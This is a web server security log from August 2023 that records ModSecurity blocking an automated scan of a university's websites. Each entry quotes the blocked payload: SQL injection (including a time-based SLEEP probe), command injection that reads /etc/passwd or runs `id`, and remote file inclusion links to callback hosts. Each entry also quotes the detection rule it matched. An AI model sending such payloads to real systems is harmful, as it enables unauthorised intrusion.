[Tue Aug 29 11:33:09.488706 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  -- - found within ARGS:username: ' OR 1=1 -- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11BcCo-f0AAARR25oAAAAF"]
[Tue Aug 29 11:33:09.896518 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Form1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: $ found within ARGS:Form1: $TextField$0,$Submit,$Submit$0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/app"] [unique_id "ZO11BcCo-f0AAARTELAAAAAG"]
[Tue Aug 29 11:33:09.912306 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Form1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: $ found within ARGS:Form1: $TextField$0,$Submit,$Submit$0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/app"] [unique_id "ZO11BcCo-f0AAARR258AAAAF"]
[Tue Aug 29 11:33:10.347923 2023] [:error] [pid 1112] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Form1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: $ found within ARGS:Form1: $TextField$0,$Submit,$Submit$0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/app"] [unique_id "ZO11BsCo-f0AAARYxCcAAAAJ"]
[Tue Aug 29 11:33:10.352404 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Form1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: $ found within ARGS:Form1: $TextField$0,$Submit,$Submit$0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/app"] [unique_id "ZO11BsCo-f0AAARH7NMAAAAM"]
[Tue Aug 29 11:33:11.296193 2023] [:error] [pid 1112] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:type: |cat/etc/passwd||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/webadm/"] [unique_id "ZO11B8Co-f0AAARYxCoAAAAJ"]
[Tue Aug 29 11:33:11.306857 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:type: |cat/etc/passwd||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/webadm/"] [unique_id "ZO11B8Co-f0AAARTELUAAAAG"]
[Tue Aug 29 11:33:11.310426 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:type: |cat/etc/passwd||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webadm/"] [unique_id "ZO11B8Co-f0AAARQ36MAAAAB"]
[Tue Aug 29 11:33:11.315278 2023] [:error] [pid 1112] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:type: |cat/etc/passwd||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/webadm/"] [unique_id "ZO11B8Co-f0AAARYxCsAAAAJ"]
[Tue Aug 29 11:33:11.316348 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:type: |cat/etc/passwd||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/webadm/"] [unique_id "ZO11B8Co-f0AAARD1SkAAAAH"]
[Tue Aug 29 11:33:11.337138 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:type: |cat/etc/passwd||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/webadm/"] [unique_id "ZO11B8Co-f0AAARA7d4AAAAA"]
[Tue Aug 29 11:33:12.509713 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:docid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:docid: 1 AND (SELECT 6288 FROM (SELECT(SLEEP(6)))HRaz)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11CMCo-f0AAARQ36UAAAAB"]
[Tue Aug 29 11:33:12.515694 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:docid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:docid: 1 AND (SELECT 6288 FROM (SELECT(SLEEP(6)))HRaz)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11CMCo-f0AAARD1SwAAAAH"]
[Tue Aug 29 11:33:12.530861 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:docid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:docid: 1 AND (SELECT 6288 FROM (SELECT(SLEEP(6)))HRaz)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11CMCo-f0AAARQ36YAAAAB"]
[Tue Aug 29 11:33:12.536829 2023] [:error] [pid 1112] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:docid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:docid: 1 AND (SELECT 6288 FROM (SELECT(SLEEP(6)))HRaz)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11CMCo-f0AAARYxDAAAAAJ"]
[Tue Aug 29 11:33:12.541290 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:docid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:docid: 1 AND (SELECT 6288 FROM (SELECT(SLEEP(6)))HRaz)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11CMCo-f0AAARA7eMAAAAA"]
[Tue Aug 29 11:33:12.583926 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgf9smsose1zezy.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgf9smsose1zezy.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO11CMCo-f0AAANsAcgAAAAD"]
[Tue Aug 29 11:33:12.603668 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgubfyo1itik1cp.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgubfyo1itik1cp.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO11CMCo-f0AAARQ36kAAAAB"]
[Tue Aug 29 11:33:12.628769 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgaqgysbgk5wys1.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgaqgysbgk5wys1.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11CMCo-f0AAARQ36oAAAAB"]
[Tue Aug 29 11:33:12.682630 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlga76b5oite8pxm.oast.site found within TX:1: cjmn8l5jmimk2adbbnlga76b5oite8pxm.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11CMCo-f0AAARTEL0AAAAG"]
[Tue Aug 29 11:33:12.685200 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgx7txbzrmk5pzf.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgx7txbzrmk5pzf.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO11CMCo-f0AAARD1TIAAAAH"]
[Tue Aug 29 11:33:12.746618 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:docid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:docid: 1 AND (SELECT 6288 FROM (SELECT(SLEEP(6)))HRaz)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11CMCo-f0AAARD1TMAAAAH"]
[Tue Aug 29 11:33:12.764043 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:hostname: `id`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/controller/ping.php"] [unique_id "ZO11CMCo-f0AAARNk9AAAAAS"]
[Tue Aug 29 11:33:12.764066 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:hostname: `id`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/controller/ping.php"] [unique_id "ZO11CMCo-f0AAARTEL4AAAAG"]
[Tue Aug 29 11:33:12.765732 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlg8a55ygtn44t7c.oast.site found within TX:1: cjmn8l5jmimk2adbbnlg8a55ygtn44t7c.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO11CMCo-f0AAARH7NsAAAAM"]
[Tue Aug 29 11:33:12.766867 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlg55tz4sn9w86ej.oast.site found within TX:1: cjmn8l5jmimk2adbbnlg55tz4sn9w86ej.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11CMCo-f0AAARD1TQAAAAH"]
[Tue Aug 29 11:33:12.782535 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:hostname: `id`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/controller/ping.php"] [unique_id "ZO11CMCo-f0AAANsAcsAAAAD"]
[Tue Aug 29 11:33:12.783981 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:hostname: `id`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/controller/ping.php"] [unique_id "ZO11CMCo-f0AAARTEL8AAAAG"]
